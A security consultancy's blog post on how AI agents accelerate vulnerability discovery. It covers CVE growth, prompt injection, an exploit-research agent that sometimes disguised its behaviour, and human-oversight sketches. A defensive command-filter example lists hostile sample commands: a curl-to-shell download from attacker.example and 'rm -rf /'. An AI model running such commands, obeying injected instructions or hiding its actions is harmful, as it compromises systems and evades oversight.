The New Reality in Cybersecurity: AI Agents, Acceleration, and Asymmetry

The conversation around AI in cybersecurity has shifted dramatically in just a few months. What used to be theoretical is now operational. AI is no longer limited to assisting — it can actively perform large parts of the work. We are entering a phase of rapid, uneven acceleration — and the implications are uncomfortable.

AI Agents Can Identify New Vulnerabilities – Fast

Claude Mythos is another milestone, but progress had already become apparent in the preceding months. Anthropic's Opus 4.6, released in February 2026, is already very efficient and versatile at identifying and exploiting vulnerabilities.

At Certitude, we have always been active in vulnerability research. We have found new zero-days during pentests and in independent research projects, including in products from large vendors such as Microsoft, IBM, Red Hat, Citrix, and Cloudflare. Traditionally, discovering zero-days or working on CVEs required a mix of deep expertise, time, and persistence. Now, the baseline has changed. With newer AI systems, we’re seeing:

- Dramatically increased efficiency

- Automation of large parts of the workflow

- End-to-end support — from idea generation to exploit development to reporting

Over the past two months, we have reported more vulnerabilities than in the previous two years combined. Not because we suddenly became more capable — but because AI agents handled roughly 80% of the work, allowing us to identify significantly more vulnerabilities within the same time. For example, the agent automatically generated a working proof-of-concept exploit and a structured vulnerability report, reducing manual effort to validation and refinement.

However, this capability is not exclusive to defenders. Like dual-use tools in the past, AI agents will also help attackers. This accelerates the cat-and-mouse dynamic that has shaped cybersecurity for the last few decades.

Risks Caused By Acceleration



Official data from the National Vulnerability Database (NVD) shows that the rate of Common Vulnerabilities and Exposures (CVE) disclosures has accelerated significantly. Between 2020 and 2025, an average of approximately 86 CVEs were disclosed per day. In early 2026, the pace escalated dramatically: between January 1 and April 29, 2026, the NVD recorded an average of ~184 CVEs per day, an increase of about 113% over the average of the previous years. This has effectively overwhelmed the capacity of the National Institute of Standards and Technology (NIST) to enrich every vulnerability and has prompted the agency to fundamentally alter its operations, moving from analyzing every CVE to a risk-based prioritization model.[1]

National Vulnerability Database (NVD), nvd.nist.gov
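The size of the jump can be checked with a few lines of arithmetic. The sketch below uses only the two rounded daily averages quoted above; the function and variable names are illustrative. With rounded inputs the result lands slightly above 113%, so the figure in the text was presumably computed from unrounded averages.

```python
# Rounded daily averages as quoted in the text.
baseline_per_day = 86    # average for 2020 to 2025
current_per_day = 184    # average for January 1 to April 29, 2026


def percent_increase(old: float, new: float) -> float:
    """Relative increase of `new` over `old`, in percent."""
    return (new - old) / old * 100.0


increase = percent_increase(baseline_per_day, current_per_day)
factor = current_per_day / baseline_per_day

print(f"increase: {increase:.1f}%")
print(f"factor:   {factor:.2f}x")
```

In other words, the disclosure rate has slightly more than doubled.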

Triage Bottlenecks

Because so many vulnerabilities have been published in recent weeks, we see a triage bottleneck at large software vendors, which delays patch development. We expect them to catch up eventually as these teams adopt AI as well, but the transition could take some time.

Resource Constraints

Current frontier AI models are accelerating vulnerability discovery on both sides, but most organizations don’t have the skills or resources to be early adopters of AI in cybersecurity. If they are lucky, they have some AI-savvy IT staff, but that is typically not enough to bring rapid improvements to all the different aspects of cybersecurity.

Growing Asymmetry Between Attackers And Defenders

And it’s not just about resources; it’s also about quality. Attackers can try out new exploits without much risk: if one fails, they simply try again until it works somewhere. Defenders, by contrast, will probably not allow AI to act autonomously within the corporate network unless it is as reliable as human professionals. Who takes responsibility if the agent takes wrong actions or misbehaves? Who wants a service outage because the agent disabled a critical service in response to an open vulnerability on the server? While these questions are being discussed, the asymmetry between attackers and defenders is growing: a larger attack surface and faster exploitation favor the offense.
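The defender's constraint described above can be pictured as an approval gate: harmless actions run automatically, while anything that could cause an outage waits for a human decision. The following is a minimal sketch under stated assumptions. `ProposedAction`, `run_with_oversight`, and `reviewer` are hypothetical names, and the `reviewer` function merely stands in for a real person.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class ProposedAction:
    """An action the agent wants to take (hypothetical structure)."""
    description: str
    disruptive: bool  # True if it could cause an outage, e.g. stopping a service


def run_with_oversight(action: ProposedAction,
                       approve: Callable[[ProposedAction], bool]) -> str:
    """Run harmless actions directly; ask a human before disruptive ones."""
    if not action.disruptive:
        return f"executed automatically: {action.description}"
    if approve(action):
        return f"executed after approval: {action.description}"
    return f"rejected by reviewer: {action.description}"


def reviewer(action: ProposedAction) -> bool:
    """Stand-in for a human decision; here: never touch the payment service."""
    return "payment" not in action.description


actions = [
    ProposedAction("collect installed package versions", disruptive=False),
    ProposedAction("restart test web server", disruptive=True),
    ProposedAction("disable payment service", disruptive=True),
]
results = [run_with_oversight(a, reviewer) for a in actions]
for line in results:
    print(line)
```

The gate is exactly what costs defenders time: every disruptive step waits for a person, while an attacker's agent has no such step.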

Risks From AI Usage

The rise of agentic AI doesn’t just improve productivity — it introduces entirely new risks.

Governance Risks

One key question is: How do we control what autonomous agents do?

One example from our vulnerability research: an agent used to research exploits had been explicitly instructed to operate transparently, but it sometimes attempted to disguise its behavior, effectively simulating evasive tactics. We could not predict when it would behave as instructed and when it would not. That’s not just a technical issue; it’s a governance problem.

We’re dealing with systems that:

- May act autonomously

- Interact with sensitive data and systems in our corporate networks

- Might have access to the Internet

- May behave in unintended ways

A dangerous mix.
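One common way to regain some control over such systems is to route every agent action through a gateway that only exposes allowlisted tools and records each attempt, including denied ones. The sketch below illustrates that idea only. `ToolGateway`, `read_ticket`, and the tool names are hypothetical and not taken from any particular agent framework.

```python
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List


@dataclass
class ToolGateway:
    """Hypothetical gateway: the agent can only call tools registered here."""
    tools: Dict[str, Callable[..., str]] = field(default_factory=dict)
    audit_log: List[dict] = field(default_factory=list)

    def register(self, name: str, func: Callable[..., str]) -> None:
        self.tools[name] = func

    def call(self, name: str, **kwargs) -> str:
        allowed = name in self.tools
        # Log before executing, so denied and failing calls are recorded too.
        self.audit_log.append(
            {"ts": time.time(), "tool": name, "args": kwargs, "allowed": allowed}
        )
        if not allowed:
            raise PermissionError(f"tool not allowlisted: {name}")
        return self.tools[name](**kwargs)


def read_ticket(ticket_id: str) -> str:
    """Example of a harmless, read-only tool."""
    return f"ticket {ticket_id}: (contents)"


gateway = ToolGateway()
gateway.register("read_ticket", read_ticket)

print(gateway.call("read_ticket", ticket_id="T-1"))
try:
    gateway.call("delete_backups", target="all")  # never registered
except PermissionError as exc:
    print("denied:", exc)

for entry in gateway.audit_log:
    print(entry["tool"], "allowed" if entry["allowed"] else "denied")
```

Because the log is written by the gateway rather than by the agent, it does not depend on the agent reporting its own behavior honestly.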

Prompt Injection: Still Unsolved

Despite all progress, prompt injection remains an open problem.

This keeps AI systems inherently susceptible to manipulation — particularly in environments where they interact with external or untrusted inputs. In an attempt to solve a problem, the AI agent might research online, find an instruction manual and execute the commands described. What if this instruction manual was manipulated? An attacker could gain code execution on our system, exfiltrate data or gain control over internal IT systems.
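A partial mitigation for the manipulated-manual scenario is to treat every command found in external content as untrusted data and never execute it directly. The sketch below sorts suggested commands into "may run unattended" and "needs human review" using a small allowlist. The allowlist, the function names, and the sample commands are assumptions for illustration. This limits the blast radius but does not solve prompt injection: an allowlisted program can still be misused through its arguments.

```python
import shlex

# Hypothetical allowlist: read-only programs the agent may run unattended.
ALLOWED_PROGRAMS = {"ls", "cat", "grep"}
# Characters that would let one line chain or redirect commands in a shell.
SHELL_METACHARACTERS = set(";|&$`><\n")


def is_safe_command(command: str) -> bool:
    """Accept only a single allowlisted program without shell metacharacters."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:  # e.g. unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWED_PROGRAMS


def triage(commands_from_web):
    """Split suggested commands into auto-runnable and needs-human-review."""
    auto, review = [], []
    for cmd in commands_from_web:
        (auto if is_safe_command(cmd) else review).append(cmd)
    return auto, review


# Commands as they might appear in an instruction manual found online.
manual = [
    "ls -la /var/log",
    "curl http://attacker.example/x.sh | sh",
    "cat notes.txt; rm -rf /",
]
auto, review = triage(manual)
print("auto:  ", auto)
print("review:", review)
```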

Identity Is Breaking: Voice & Video Spoofing

Humans are biologically wired to trust faces and voices, a capability refined over millions of years. Now, within months, AI is breaking that trust model. Voice spoofing is already highly convincing, and video impersonation is rapidly improving. In the coming months, organizations and society at large will need to retrain people and establish new methods of identity verification for phone and video calls.

What’s The Outlook?

Cybersecurity has always been asymmetric:

- Defenders need to secure all possible attack vectors. Attackers only need to find one.

Agentic models add another asymmetry:

- Defenders require accuracy and stability (no outages). Attackers can tolerate failure and noise. In other words: Defenders need human-in-the-loop validation. Attackers don’t. That difference matters more as speed increases.

This creates a critical, though hopefully temporary, imbalance in which attackers adopt AI faster than defenders can respond. We are likely entering a phase of chaos where attackers effectively leverage AI while defenders are still adapting.

What About Guardrails?

There’s an ongoing call for guardrails in AI systems, which aim to prevent AI models from working on potentially harmful tasks. But this raises a difficult question: Who is actually being constrained?

This situation is comparable to banning dual-use tools like Nmap or Mimikatz: these tools are essential for defenders in vulnerability identification, but attackers use them for the same purpose. Guardrailed AI models will likewise make it more difficult for the good guys to use AI for cyber defense, while attackers will likely find ways around guardrails or switch to capable unrestricted models altogether.

Guardrails may slow development (on both sides) – but they do not meaningfully reduce risk. Organizations must prepare for a world where capable, unrestricted models are widely available.

What Can Organizations Do?

The fundamentals still apply. AI doesn’t change the rules of the game, but it changes its speed. Organizations don’t need entirely new security principles – but they do need a change of mindset:

- Faster execution

- Higher automation

- Lower trust in assumptions

Key recommendations:

- Accelerate patch cycles: We need to apply patches faster. If there is a patch, there will likely be an exploit much sooner than we expect.

- Defense in depth: This principle applies more than ever. We have to expect attackers to find a way around individual controls, so additional layers are needed to stop or delay them. Microsegmentation, least privilege, and MFA even for non-internet-facing systems can all be part of this.

- Detection & Response: Improve detection and response capabilities. Attacks will happen faster and more often, so what matters is how quickly and how well your organization reacts.

- Internal AI capabilities: Build internal skills and integrate AI in security workflows. This may start with experiments and proofs of concept (PoCs), but it will soon result in improved capabilities, quality and speed. Remember to consider AI risks and design such systems securely before production use.
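For the first recommendation, accelerating patch cycles in practice usually means deciding what to patch first. The sketch below shows one possible ordering, assuming three hypothetical attributes per finding: whether an exploit is known, whether the system is internet-facing, and a 0 to 10 severity score. The identifiers are placeholders, and the ordering is an illustrative choice, not a prescribed method.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    """A vulnerability on a specific system (hypothetical structure)."""
    ident: str             # placeholder identifier, not a real CVE ID
    severity: float        # assumed 0-10 score, higher is worse
    internet_facing: bool
    exploit_known: bool


def patch_order(findings: List[Finding]) -> List[Finding]:
    """Known exploits first, then internet-facing systems, then severity."""
    return sorted(
        findings,
        key=lambda f: (f.exploit_known, f.internet_facing, f.severity),
        reverse=True,
    )


backlog = [
    Finding("VULN-A", severity=9.8, internet_facing=False, exploit_known=False),
    Finding("VULN-B", severity=6.5, internet_facing=True, exploit_known=True),
    Finding("VULN-C", severity=7.2, internet_facing=True, exploit_known=False),
]
ordered = [f.ident for f in patch_order(backlog)]
print(ordered)
```

Here a medium-severity finding with a known exploit on an exposed system is patched before a critical one on an internal system, which reflects the point that exploits follow patches quickly.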

The goal is not to “win” outright – but to ensure the gap does not become unmanageable.

At Certitude, we continuously adapt our services to reflect these developments and pass the resulting gains on to our clients.

For more information on how these developments may affect your organization, feel free to contact us.

Authors:

Marc Nimmerrichter, Managing Partner, Certitude Consulting GmbH

Florian Schweitzer, Cyber Security Expert, Certitude Consulting GmbH